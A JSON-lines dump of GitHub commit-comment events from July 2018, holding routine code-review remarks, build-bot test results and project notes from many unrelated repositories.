{"id":"7932831641","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29630726,"position":null,"line":null,"path":null,"commit_id":"c7cea2685a8ddfa655e11e4f24b5aa1a4f2000c1","created_at":"2018-07-07T19:41:35Z","updated_at":"2018-07-07T19:41:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T19:41:35Z"}
{"id":"7932834815","type":"CommitCommentEvent","actor":{"login":"Avi-tech"},"repo":{"name":"Avi-tech/Programming-with-Python__Code_Academy__7-3--9-18"},"payload":{"comment":{"id":29630730,"position":null,"line":null,"path":null,"commit_id":"d6e557ce32b3bfb8c94a1b0224d3f652d3d94763","created_at":"2018-07-07T19:44:01Z","updated_at":"2018-07-07T19:44:01Z","author_association":"OWNER","body":"none"}},"created_at":"2018-07-07T19:44:01Z"}
{"id":"7932839427","type":"CommitCommentEvent","actor":{"login":"Walrus24"},"repo":{"name":"LuigiBoi/citbus-station"},"payload":{"comment":{"id":29630738,"position":12,"line":320,"path":"code/_onclick/hud/human.dm","commit_id":"9abd94779020bcb6fa2fce03dfb07fe8975f3dcf","created_at":"2018-07-07T19:48:02Z","updated_at":"2018-07-07T19:48:02Z","author_association":"NONE","body":"worried about this, isnt this removing the hud for stamina?"}},"created_at":"2018-07-07T19:48:02Z"}
{"id":"7932840358","type":"CommitCommentEvent","actor":{"login":"LuigiBoi"},"repo":{"name":"LuigiBoi/citbus-station"},"payload":{"comment":{"id":29630739,"position":12,"line":320,"path":"code/_onclick/hud/human.dm","commit_id":"9abd94779020bcb6fa2fce03dfb07fe8975f3dcf","created_at":"2018-07-07T19:48:46Z","updated_at":"2018-07-07T19:48:46Z","author_association":"OWNER","body":"Ill work it out, like i said this is heavily bugged"}},"created_at":"2018-07-07T19:48:46Z"}
{"id":"7932840967","type":"CommitCommentEvent","actor":{"login":"Walrus24"},"repo":{"name":"LuigiBoi/citbus-station"},"payload":{"comment":{"id":29630740,"position":12,"line":320,"path":"code/_onclick/hud/human.dm","commit_id":"9abd94779020bcb6fa2fce03dfb07fe8975f3dcf","created_at":"2018-07-07T19:49:16Z","updated_at":"2018-07-07T19:49:16Z","author_association":"NONE","body":"just saying, you should remove stamina shit in this one."}},"created_at":"2018-07-07T19:49:16Z"}
{"id":"7932841541","type":"CommitCommentEvent","actor":{"login":"LuigiBoi"},"repo":{"name":"LuigiBoi/citbus-station"},"payload":{"comment":{"id":29630745,"position":12,"line":320,"path":"code/_onclick/hud/human.dm","commit_id":"9abd94779020bcb6fa2fce03dfb07fe8975f3dcf","created_at":"2018-07-07T19:49:46Z","updated_at":"2018-07-07T19:49:46Z","author_association":"OWNER","body":"I have to fix pressure, ill fix this in a bit"}},"created_at":"2018-07-07T19:49:46Z"}
{"id":"7932843813","type":"CommitCommentEvent","actor":{"login":"ekeeke"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":29630748,"position":null,"line":null,"path":null,"commit_id":"7af5a0cdf484b0d6534024d02e07eda16340a50f","created_at":"2018-07-07T19:51:43Z","updated_at":"2018-07-07T19:51:43Z","author_association":"OWNER","body":"Yes, the same defined was added in libretro Makefile to compile on windows but I have it locally removed because I still use mingw32 personally. I don't mind if you add it in SDL Makefile as I have my own personal local copy as well when I want to test the emulator on windows and I guess it's safe to assume most people use 64-bit system and applications now.\r\n\r\nOr you could try to define HAVE_FSEEKO in Makefile only if __MINGW64__ is defined (use the FLAGS define that is empty actually in SDL Makefiles)  as  HAVE_FSEEKO is only checked (in libFLAC) when __MINGW32__ is  defined (which is the case with both mingw32 and mingw64)."}},"created_at":"2018-07-07T19:51:43Z"}
{"id":"7932844059","type":"CommitCommentEvent","actor":{"login":"3lim"},"repo":{"name":"JoeKan/stereoMatching"},"payload":{"comment":{"id":29630749,"position":81,"line":82,"path":"src/PrimalDual.cpp","commit_id":"39c9e68f4e9d127946fcfd36d94c847552e95c34","created_at":"2018-07-07T19:51:56Z","updated_at":"2018-07-07T19:51:56Z","author_association":"COLLABORATOR","body":"Yes :-)"}},"created_at":"2018-07-07T19:51:56Z"}
{"id":"7932845445","type":"CommitCommentEvent","actor":{"login":"pgjones"},"repo":{"name":"encode/uvicorn"},"payload":{"comment":{"id":29630750,"position":300,"line":300,"path":"uvicorn/protocols/http/h11.py","commit_id":"07c6c18945ab4f4167118e717e197adce3aee3da","created_at":"2018-07-07T19:53:09Z","updated_at":"2018-07-07T19:53:09Z","author_association":"CONTRIBUTOR","body":"https://github.com/encode/uvicorn/pull/119"}},"created_at":"2018-07-07T19:53:09Z"}
{"id":"7932846236","type":"CommitCommentEvent","actor":{"login":"sea9833"},"repo":{"name":"sea9833/hello-world"},"payload":{"comment":{"id":29630753,"position":2,"line":2,"path":"README.md","commit_id":"30ac697cb836c01a617bf8e00eb0178ece8c361d","created_at":"2018-07-07T19:53:55Z","updated_at":"2018-07-07T19:53:55Z","author_association":"OWNER","body":"I am really excited to relearn Java Script, HTML, CSS, C++, and Python! For months I have been taking tutorials, going to meet up groups for advice, but NOW, I am ready to start some projects and put what I have learned into practical use. "}},"created_at":"2018-07-07T19:53:55Z"}
{"id":"7932850967","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29630764,"position":null,"line":null,"path":null,"commit_id":"d764ca6ab9358627c2fdcbefd40851dc74b850ba","created_at":"2018-07-07T19:58:10Z","updated_at":"2018-07-07T19:58:10Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1685 of 1685 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-07T19:58:10Z"}
{"id":"7931585318","type":"CommitCommentEvent","actor":{"login":"chidamodu"},"repo":{"name":"chidamodu/Yelp_dataset_challenge2018"},"payload":{"comment":{"id":29627966,"position":null,"line":null,"path":null,"commit_id":"b25fa3965c79d4350d0cac9daa714d86e6a49d87","created_at":"2018-07-07T02:00:23Z","updated_at":"2018-07-07T02:00:23Z","author_association":"OWNER","body":"Yelp hosted this dataset challenge asking if participants could do better with its reviews, photos, and Graph QL. Although those categories sound enticing, I rather went with a quest, \"Would it be possible to do anything with the neighborhoods?\" Maybe because I wanted to work with latitudes and longitudes for so long :) This project is still a work in progress, but planning to upload what I envisioned to do with the neighborhoods."}},"created_at":"2018-07-07T02:00:23Z"}
{"id":"7931587054","type":"CommitCommentEvent","actor":{"login":"Akshay-Venkatesh"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29627971,"position":26,"line":148,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_iface.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-07T02:01:43Z","updated_at":"2018-07-07T02:01:43Z","author_association":"NONE","body":"Does this mean that everytime we make progress and complete an outstanding mempcyAsync, the memory mapped for that operation will be unmapped and that memory handle is closed?"}},"created_at":"2018-07-07T02:01:43Z"}
{"id":"7931587826","type":"CommitCommentEvent","actor":{"login":"Akshay-Venkatesh"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29627972,"position":26,"line":148,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_iface.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-07T02:02:22Z","updated_at":"2018-07-07T02:02:22Z","author_association":"NONE","body":"Ignore this. I saw that when cache is enabled, it points to an empty function."}},"created_at":"2018-07-07T02:02:22Z"}
{"id":"7931588322","type":"CommitCommentEvent","actor":{"login":"atharnaqvi"},"repo":{"name":"atharnaqvi/Wonga"},"payload":{"comment":{"id":29627973,"position":null,"line":null,"path":null,"commit_id":"50a3f8aa02ad2e19f3c1358c8cfad4b1fc01bb77","created_at":"2018-07-07T02:02:50Z","updated_at":"2018-07-07T02:02:50Z","author_association":"OWNER","body":"Wonga Testing Framework"}},"created_at":"2018-07-07T02:02:50Z"}
{"id":"7931588652","type":"CommitCommentEvent","actor":{"login":"bureddy"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29627974,"position":26,"line":148,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_iface.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-07T02:03:08Z","updated_at":"2018-07-07T02:03:08Z","author_association":"OWNER","body":"this func pointer is empty func when cachin is enabled(see line 276). we have to close the handle everytime when caching is disabled"}},"created_at":"2018-07-07T02:03:08Z"}
{"id":"7931588836","type":"CommitCommentEvent","actor":{"login":"fungilation"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29627975,"position":null,"line":null,"path":null,"commit_id":"699e5eebe807d1ced660d2d2f39b5679d26925da","created_at":"2018-07-07T02:03:17Z","updated_at":"2018-07-07T02:03:17Z","author_association":"NONE","body":"I had to stay on gradle plugin 2.2.3 (com.android.tools.build:gradle) to avoid android build failing with NDK r17: https://github.com/facebook/react-native/issues/19321. NDK 17 is default with current Android Studio."}},"created_at":"2018-07-07T02:03:17Z"}
{"id":"7931589099","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29627976,"position":null,"line":null,"path":null,"commit_id":"36a3ba61c7af3d63354972c18cfb7bd91aeadf8a","created_at":"2018-07-07T02:03:31Z","updated_at":"2018-07-07T02:03:31Z","author_association":"NONE","body":"Hi, these are the current build failures I have been getting today -\r\n\r\n<retrobot> retroarch-dex: [status: fail] [recipes/playstation/ps3] LOG: http://p.0bl.net/14498\r\n<retrobot> retroarch-cex: [status: fail] [recipes/playstation/ps3] LOG: http://p.0bl.net/14499\r\n<retrobot> retroarch-ode: [status: fail] [recipes/playstation/ps3] LOG: http://p.0bl.net/14500\r\n<retrobot> theodore: [status: fail] [recipes/windows/cores-windows-msvc2010-x64_seh-generic] LOG: http://p.0bl.net/14485\r\n<retrobot> theodore: [status: fail] [recipes/windows/cores-windows-msvc2010-x86_dw2-generic] LOG: http://p.0bl.net/14488\r\n<retrobot> theodore: [status: fail] [recipes/windows/cores-windows-msvc2003-x86_dw2-generic] LOG: http://p.0bl.net/14493\r\n\r\nI will let you know tomorrow if some of these builds have started compiling properly."}},"created_at":"2018-07-07T02:03:31Z"}
{"id":"7931589693","type":"CommitCommentEvent","actor":{"login":"ym-kang"},"repo":{"name":"pjreddie/darknet"},"payload":{"comment":{"id":29627980,"position":null,"line":null,"path":null,"commit_id":"6c8ed1bde84b27e9fbc0259e4ffd415a7d2c951b","created_at":"2018-07-07T02:04:04Z","updated_at":"2018-07-07T02:04:04Z","author_association":"NONE","body":"There's an error. Maximum value of k must be box count."}},"created_at":"2018-07-07T02:04:04Z"}
{"id":"7931589782","type":"CommitCommentEvent","actor":{"login":"null-von-sushi"},"repo":{"name":"null-von-sushi/Discord-for-Linux-Wine-helper"},"payload":{"comment":{"id":29627981,"position":null,"line":null,"path":null,"commit_id":"7d7463117507fdc33348294d6a3a27609dd4fc19","created_at":"2018-07-07T02:04:10Z","updated_at":"2018-07-07T02:04:10Z","author_association":"OWNER","body":"Note that I do not know WHY league of legends is missing an `e` in the file extension, but for some reason that is just how `pgrep` sees it..."}},"created_at":"2018-07-07T02:04:10Z"}
{"id":"7931590033","type":"CommitCommentEvent","actor":{"login":"bureddy"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29627983,"position":215,"line":215,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_cache.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-07T02:04:23Z","updated_at":"2018-07-07T02:04:23Z","author_association":"OWNER","body":"not sure if I got your point. But this is to store in the page table cache. but not for memhandle open/map"}},"created_at":"2018-07-07T02:04:23Z"}
{"id":"7931590653","type":"CommitCommentEvent","actor":{"login":"janoulle"},"repo":{"name":"janoulle/NEGARestaurantScores"},"payload":{"comment":{"id":29627984,"position":null,"line":null,"path":null,"commit_id":"23304ee04414cbc175e1d7e6c7ef0c1ca0536b79","created_at":"2018-07-07T02:04:55Z","updated_at":"2018-07-07T02:04:55Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Code Review of project](https://trello.com/c/Bwki7Ut2/70-code-review-of-project)"}},"created_at":"2018-07-07T02:04:55Z"}
{"id":"7931591303","type":"CommitCommentEvent","actor":{"login":"bureddy"},"repo":{"name":"bureddy/ucx"},"payload":{"comment":{"id":29627985,"position":187,"line":187,"path":"src/uct/cuda/cuda_ipc/cuda_ipc_cache.c","commit_id":"0dec2eb21157fb3c6d20188a16e368e73ad10951","created_at":"2018-07-07T02:05:16Z","updated_at":"2018-07-07T02:05:16Z","author_association":"OWNER","body":"this may never happen. but just for sanity to see if it works when close all handles.  I saw similar kind of logic in OMPI"}},"created_at":"2018-07-07T02:05:16Z"}
{"id":"7931591951","type":"CommitCommentEvent","actor":{"login":"huazai-688"},"repo":{"name":"huazai-688/RepositoryTest"},"payload":{"comment":{"id":29627987,"position":null,"line":null,"path":null,"commit_id":"3b68ccc3dd3684b9e56473d5434b5d55948038a5","created_at":"2018-07-07T02:05:47Z","updated_at":"2018-07-07T02:05:47Z","author_association":"OWNER","body":"This is my project."}},"created_at":"2018-07-07T02:05:47Z"}
{"id":"7931595747","type":"CommitCommentEvent","actor":{"login":"skaman123"},"repo":{"name":"opensourcepos/opensourcepos"},"payload":{"comment":{"id":29627990,"position":null,"line":null,"path":null,"commit_id":"1026ebb0ebd632ef7a9c660f8c6f59fd448e8f73","created_at":"2018-07-07T02:09:10Z","updated_at":"2018-07-07T02:09:10Z","author_association":"NONE","body":"Gud day sir i've notice this on POST form data['csrf_ospos_v3'], Is this error or ok? After saving a localization in Store settings i came with this result\r\n\r\n![err](https://user-images.githubusercontent.com/10420647/42405573-621ae592-815e-11e8-944c-b6d14e3f6cdf.JPG)\r\n"}},"created_at":"2018-07-07T02:09:10Z"}
{"id":"7931596361","type":"CommitCommentEvent","actor":{"login":"nairdo"},"repo":{"name":"SparkDevNetwork/Rock"},"payload":{"comment":{"id":29627991,"position":15,"line":51,"path":"Rock.Migrations/Migrations/201806191944509_ncoaHistory_AddReportExportId.cs","commit_id":"f1b137834f46f8366bdaa8e5f395b954ef751e90","created_at":"2018-07-07T02:09:43Z","updated_at":"2018-07-07T02:09:43Z","author_association":"MEMBER","body":"@GerhardPowell This is broken.  You'll need to be careful and be sure to escape any single quotes in SQL migrations like this."}},"created_at":"2018-07-07T02:09:43Z"}
{"id":"7931597687","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29627992,"position":null,"line":null,"path":null,"commit_id":"e9f4d0f738eccf03a503b66bf687a7d1b6768ec0","created_at":"2018-07-07T02:10:57Z","updated_at":"2018-07-07T02:10:57Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Terminar aplicação de rede para módulo de pagamento](https://trello.com/c/P2z6SP4V/209-terminar-aplica%C3%A7%C3%A3o-de-rede-para-m%C3%B3dulo-de-pagamento)"}},"created_at":"2018-07-07T02:10:57Z"}
{"id":"7931600951","type":"CommitCommentEvent","actor":{"login":"islamshaabaan"},"repo":{"name":"AhmedMahmoad/ASUMobiCarG24"},"payload":{"comment":{"id":29627999,"position":161,"line":161,"path":"Project Files/Phase 3.ino","commit_id":"fbe92cb29fc08a1e64dc933e3c3148489ba6ae76","created_at":"2018-07-07T02:14:01Z","updated_at":"2018-07-07T02:14:01Z","author_association":"COLLABORATOR","body":"delete this line"}},"created_at":"2018-07-07T02:14:01Z"}
{"id":"7931602093","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29628002,"position":5,"line":42,"path":"Dodo.RestaurantBoard.Tests/CallCenterTests.cs","commit_id":"3e884c127c82423cd7357bb21835ce54b1675acc","created_at":"2018-07-07T02:15:07Z","updated_at":"2018-07-07T02:15:07Z","author_association":"MEMBER","body":"Хорошо, что убрали использование констант в тесте.\r\nПлохо, что не удалили сами константы."}},"created_at":"2018-07-07T02:15:07Z"}
{"id":"7931604578","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29628006,"position":17,"line":52,"path":"Dodo.RestaurantBoard.Tests/CallCenterTests.cs","commit_id":"3e884c127c82423cd7357bb21835ce54b1675acc","created_at":"2018-07-07T02:17:24Z","updated_at":"2018-07-07T02:17:24Z","author_association":"MEMBER","body":"Название теста ужасное. Длинное и непонятное. Если бы вы кому-то объясняли именно этот аспект поведения кода, вы бы именно этими словами это описывали?"}},"created_at":"2018-07-07T02:17:24Z"}
{"id":"7931605154","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29628007,"position":26,"line":60,"path":"Dodo.RestaurantBoard.Tests/CallCenterTests.cs","commit_id":"3e884c127c82423cd7357bb21835ce54b1675acc","created_at":"2018-07-07T02:17:57Z","updated_at":"2018-07-07T02:17:57Z","author_association":"MEMBER","body":"переменная iconPath не нужна"}},"created_at":"2018-07-07T02:17:57Z"}
{"id":"7931605643","type":"CommitCommentEvent","actor":{"login":"hestefani900"},"repo":{"name":"ORCID/ORCID-Source"},"payload":{"comment":{"id":29628008,"position":1,"line":1,"path":"orcid-api-web/tutorial/revoke.md","commit_id":"edf0358fdf18a098d795027dcd4d06b719912862","created_at":"2018-07-07T02:18:23Z","updated_at":"2018-07-07T02:18:23Z","author_association":"NONE","body":"Facebook "}},"created_at":"2018-07-07T02:18:23Z"}
{"id":"7931606009","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628009,"position":null,"line":null,"path":null,"commit_id":"aae388b45b15dd61bf1a1356c58b08321deee879","created_at":"2018-07-07T02:18:46Z","updated_at":"2018-07-07T02:18:46Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2973 of 2973 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aae388b45b15dd61bf1a1356c58b08321deee879-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-07T02:18:46Z"}
{"id":"7931606176","type":"CommitCommentEvent","actor":{"login":"haixinxu"},"repo":{"name":"haixinxu/tor-shift"},"payload":{"comment":{"id":29628010,"position":null,"line":null,"path":null,"commit_id":"78e7439e58d5287b985077a27830a40d23d82746","created_at":"2018-07-07T02:18:56Z","updated_at":"2018-07-07T02:18:56Z","author_association":"OWNER","body":"revert"}},"created_at":"2018-07-07T02:18:56Z"}
{"id":"7931606243","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29628011,"position":12,"line":48,"path":"Dodo.RestaurantBoard.Tests/CallCenterTests.cs","commit_id":"3e884c127c82423cd7357bb21835ce54b1675acc","created_at":"2018-07-07T02:19:00Z","updated_at":"2018-07-07T02:19:00Z","author_association":"MEMBER","body":"Тестовые данные не похожи на настоящие. 3-значных телефонов не бывает. \r\nТеперь это стало видно."}},"created_at":"2018-07-07T02:19:00Z"}
{"id":"7931608069","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29628013,"position":null,"line":null,"path":null,"commit_id":"3e884c127c82423cd7357bb21835ce54b1675acc","created_at":"2018-07-07T02:20:43Z","updated_at":"2018-07-07T02:20:43Z","author_association":"MEMBER","body":"В GetCallCenterPhonesFromXml_CallCenterPhonesXElement3Phones_Contains3Phones замечания не исправлены. Недостаточно просто проверить количество 3. "}},"created_at":"2018-07-07T02:20:43Z"}
{"id":"7931608314","type":"CommitCommentEvent","actor":{"login":"James-W2"},"repo":{"name":"web-scrobbler/web-scrobbler"},"payload":{"comment":{"id":29628014,"position":null,"line":null,"path":null,"commit_id":"98f23ac85a5ac60e1a468812b4c6bb45c521e0f9","created_at":"2018-07-07T02:20:56Z","updated_at":"2018-07-07T02:20:56Z","author_association":"NONE","body":"May I ask **when** the Pandora web-scrobbler extension for Chrome you fixed **will be uploaded and be ready to install?**  I too reinstalled the most recent web-scrobbler extension in Chrome's extension store with no change in performance (i.e. still no scrobbling).  It does continue to work well for Soundcloud, however.   Thanks for your help.  What should my procedure be once the file is uploaded to complete the fix on my end?"}},"created_at":"2018-07-07T02:20:56Z"}
{"id":"7931608570","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29628015,"position":null,"line":null,"path":null,"commit_id":"3e884c127c82423cd7357bb21835ce54b1675acc","created_at":"2018-07-07T02:21:10Z","updated_at":"2018-07-07T02:21:10Z","author_association":"MEMBER","body":"Во всех тестах ужасные нечитаемые названия.\r\n"}},"created_at":"2018-07-07T02:21:10Z"}
{"id":"7931616436","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29628032,"position":12,"line":23,"path":"Dodo.RestaurantBoard.Tests/UuidTests.cs","commit_id":"3e884c127c82423cd7357bb21835ce54b1675acc","created_at":"2018-07-07T02:28:33Z","updated_at":"2018-07-07T02:28:33Z","author_association":"MEMBER","body":"Зачем _Uuid_? Чем оно помогает в названии теста, кроме того что мешает? Вы ведь уже описали, что тестируем создание Uuid."}},"created_at":"2018-07-07T02:28:33Z"}
{"id":"7931617005","type":"CommitCommentEvent","actor":{"login":"dulmandakh"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29628033,"position":null,"line":null,"path":null,"commit_id":"699e5eebe807d1ced660d2d2f39b5679d26925da","created_at":"2018-07-07T02:29:13Z","updated_at":"2018-07-07T02:29:13Z","author_association":"COLLABORATOR","body":"IIRC, NDK is not installed on with Android Studio, and you can download any\nversion of NDK, then point to it in Gradle settings or env variable. Also\nyou don't need NDK to use RN.\n"}},"created_at":"2018-07-07T02:29:13Z"}
{"id":"7931617399","type":"CommitCommentEvent","actor":{"login":"dsonet"},"repo":{"name":"Quinton/node-apollo"},"payload":{"comment":{"id":29628034,"position":19,"line":64,"path":"lib/apollo.js","commit_id":"8839c167e39322ebdbf3154e7049b2af58f83160","created_at":"2018-07-07T02:29:41Z","updated_at":"2018-07-07T02:29:41Z","author_association":"NONE","body":"Should be administrator"}},"created_at":"2018-07-07T02:29:41Z"}
{"id":"7931617415","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29628035,"position":null,"line":null,"path":null,"commit_id":"3e884c127c82423cd7357bb21835ce54b1675acc","created_at":"2018-07-07T02:29:41Z","updated_at":"2018-07-07T02:29:41Z","author_association":"MEMBER","body":"Много грязного кода. TestDebugger какой-то, бессмысленный DepartmentsStructureServiceTests.\r\nПрберитесь в коде."}},"created_at":"2018-07-07T02:29:41Z"}
{"id":"7931618788","type":"CommitCommentEvent","actor":{"login":"xym100111100"},"repo":{"name":"nnzbz/notes"},"payload":{"comment":{"id":29628040,"position":null,"line":null,"path":null,"commit_id":"4617fa8d8e8b62cafcca0aef10b9e65295ca3b7f","created_at":"2018-07-07T02:30:48Z","updated_at":"2018-07-07T02:30:48Z","author_association":"COLLABORATOR","body":"更新"}},"created_at":"2018-07-07T02:30:48Z"}
{"id":"7931620541","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29628042,"position":null,"line":null,"path":null,"commit_id":"70300e72b9d6bfb73b8bae125a3e8c49299e1e35","created_at":"2018-07-07T02:32:27Z","updated_at":"2018-07-07T02:32:27Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Terminar aplicação de rede para módulo de pagamento](https://trello.com/c/P2z6SP4V/209-terminar-aplica%C3%A7%C3%A3o-de-rede-para-m%C3%B3dulo-de-pagamento)"}},"created_at":"2018-07-07T02:32:27Z"}
{"id":"7931626454","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628048,"position":null,"line":null,"path":null,"commit_id":"54cc43a3e65dd17c01c8760715a4a570db56eb7a","created_at":"2018-07-07T02:38:07Z","updated_at":"2018-07-07T02:38:07Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-54cc43a3e65dd17c01c8760715a4a570db56eb7a-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-54cc43a3e65dd17c01c8760715a4a570db56eb7a-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-07T02:38:07Z"}
{"id":"7931627568","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29628050,"position":null,"line":null,"path":null,"commit_id":"30d4b8c17558d1aef403bb70dde2d96369dfffdc","created_at":"2018-07-07T02:39:11Z","updated_at":"2018-07-07T02:39:11Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Terminar aplicação de rede para módulo de pagamento](https://trello.com/c/P2z6SP4V/209-terminar-aplica%C3%A7%C3%A3o-de-rede-para-m%C3%B3dulo-de-pagamento)"}},"created_at":"2018-07-07T02:39:11Z"}
{"id":"7931628101","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/mogue3"},"payload":{"comment":{"id":29628052,"position":null,"line":null,"path":null,"commit_id":"b860f7794c001d51ca798956a39f1ca850a815d5","created_at":"2018-07-07T02:39:44Z","updated_at":"2018-07-07T02:39:44Z","author_association":"OWNER","body":"For calculating clockwise (and counter-clockwise) rotations for each direction, I decided it would be easier to calculate them all ahead of time so all I have to do is a range check and the answer is already available.\r\n\r\nWith this new algorithm, creatures will flee more intelligently than in the previous game, trying to escape even if cornered."}},"created_at":"2018-07-07T02:39:44Z"}
{"id":"7931629940","type":"CommitCommentEvent","actor":{"login":"ljgithub"},"repo":{"name":"ljgithub/ejemploIngSoft"},"payload":{"comment":{"id":29628058,"position":null,"line":null,"path":null,"commit_id":"a833a44a0819a2dbb6a55be58eaaa2d7d6658eba","created_at":"2018-07-07T02:41:29Z","updated_at":"2018-07-07T02:41:29Z","author_association":"OWNER","body":"Comentario añadido "}},"created_at":"2018-07-07T02:41:29Z"}
{"id":"7931633026","type":"CommitCommentEvent","actor":{"login":"Dmatts95"},"repo":{"name":"chrisbendel/pokemon"},"payload":{"comment":{"id":29628064,"position":null,"line":null,"path":null,"commit_id":"6d9a95e2d6a41f4ad0cfd1669b0f2fb1203b426b","created_at":"2018-07-07T02:44:30Z","updated_at":"2018-07-07T02:44:30Z","author_association":"COLLABORATOR","body":"Great commit!\r\n"}},"created_at":"2018-07-07T02:44:30Z"}
{"id":"7931634403","type":"CommitCommentEvent","actor":{"login":"rave991"},"repo":{"name":"behumble/showlicense"},"payload":{"comment":{"id":29628068,"position":1,"line":45,"path":"README.md","commit_id":"d86edb6391d856de5851cf7ce2b8b21d33a703a6","created_at":"2018-07-07T02:45:50Z","updated_at":"2018-07-07T02:45:50Z","author_association":"NONE","body":"Updated"}},"created_at":"2018-07-07T02:45:50Z"}
